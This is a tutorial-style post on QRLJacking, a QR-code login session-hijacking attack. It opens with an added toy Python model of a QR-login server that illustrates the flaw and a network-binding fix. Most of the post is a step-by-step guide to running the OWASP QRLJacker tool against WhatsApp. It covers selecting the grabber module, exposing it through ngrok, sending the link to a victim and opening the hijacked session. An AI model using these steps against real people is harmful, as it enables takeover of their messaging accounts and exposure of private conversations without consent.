QRLJacking, or Quick Response Code Login Jacking, is a simple social engineering attack vector capable of session hijacking. It affects all applications that rely on QR code login as a secure way to log into an account: scanning the QR code is what leads to the session being hijacked.
How to download and install the QRLJacking tool
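Why scanning a QR code can hand a session to someone else, shown as an added example that is not part of the original post or of the OWASP tool. It is a constructed toy model of a QR-login backend, not WhatsApp's real protocol; the class, function names, sample addresses and the "same /24 network" rule are assumptions chosen for illustration.

```python
import ipaddress
import secrets

class QRLoginServer:
    """Constructed toy model of a QR-login backend, not any real service's protocol."""

    def __init__(self, bind_to_network=False):
        self.bind_to_network = bind_to_network
        self.pending = {}   # QR token -> IP of the browser that asked for the QR code
        self.sessions = {}  # QR token -> (account, IP of the browser now logged in)

    def request_qr(self, browser_ip):
        # The token is what the QR image encodes. It identifies the requesting
        # browser session only; it says nothing about who will end up scanning it.
        token = secrets.token_urlsafe(16)
        self.pending[token] = browser_ip
        return token

    def approve(self, token, account, phone_ip):
        # Called when an already logged-in phone scans the code.
        browser_ip = self.pending.get(token)
        if browser_ip is None:
            return False  # unknown or already used token
        if self.bind_to_network and not same_network(browser_ip, phone_ip):
            return False  # scanner is not where the QR code was requested
        del self.pending[token]
        self.sessions[token] = (account, browser_ip)
        return True

def same_network(ip_a, ip_b, prefix=24):
    # Assumed policy: same IPv4 /24. A real service may prefer coarse location
    # or an explicit confirmation prompt, since phones are often on mobile data.
    net = ipaddress.ip_network(f"{ip_a}/{prefix}", strict=False)
    return ipaddress.ip_address(ip_b) in net

def scan_from(server, browser_ip, phone_ip, account="alice"):
    """Return (account, browser_ip) if the scan logged that browser in, else None."""
    token = server.request_qr(browser_ip)
    server.approve(token, account, phone_ip)
    return server.sessions.get(token)

if __name__ == "__main__":
    # Constructed addresses from the documentation ranges.
    for hardened in (False, True):
        server = QRLoginServer(bind_to_network=hardened)
        same = scan_from(server, "203.0.113.10", "203.0.113.25")   # phone next to the browser
        other = scan_from(server, "203.0.113.10", "198.51.100.7")  # code displayed somewhere else
        print(f"bind_to_network={hardened}: same network -> {same}, elsewhere -> {other}")
```

Without the binding check, the account is logged in on whichever browser requested the code, wherever the phone that scanned it happens to be; with the check, only a scan from the requesting browser's network completes the login.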
Step 1: Download the Tool
1. First, we need to download the QRLJacking tool, so run the following command in your terminal.
git clone https://github.com/OWASP/QRLJacking.git
2. Now change the directory to QRLJacking, so enter the following command in your terminal.
cd QRLJacking
3. Now change the directory again, this time to QRLJacker.
cd QRLJacker
Step 2: Run the tool
1. Install the requirements for the QRLJacking tool by entering the following command in your terminal.
pip install -r requirements.txt
2. After that, run the Qrljacker.py Python file by executing the following command.
python3 Qrljacker.py
Step 3: Hack WhatsApp
1. First, select the WhatsApp session hijacking module by entering the command below in your QRLJacking terminal.
use grabber/whatsapp
2. Now set the following required parameters:
- IP Address
- Port Number
set host (your local IP or ngrok)
set port 4444
3. Then type the run command to execute the WhatsApp grabber module.
run
4. Then open ngrok and share the ngrok link with your victim, because localhost is only reachable on the local network.
5. Once your victim scans your QR code, you will get a session, as shown in the image below.
6. Once you get the above message, type the following command in your QRLJacker terminal to access the victim's WhatsApp account.
session -i 0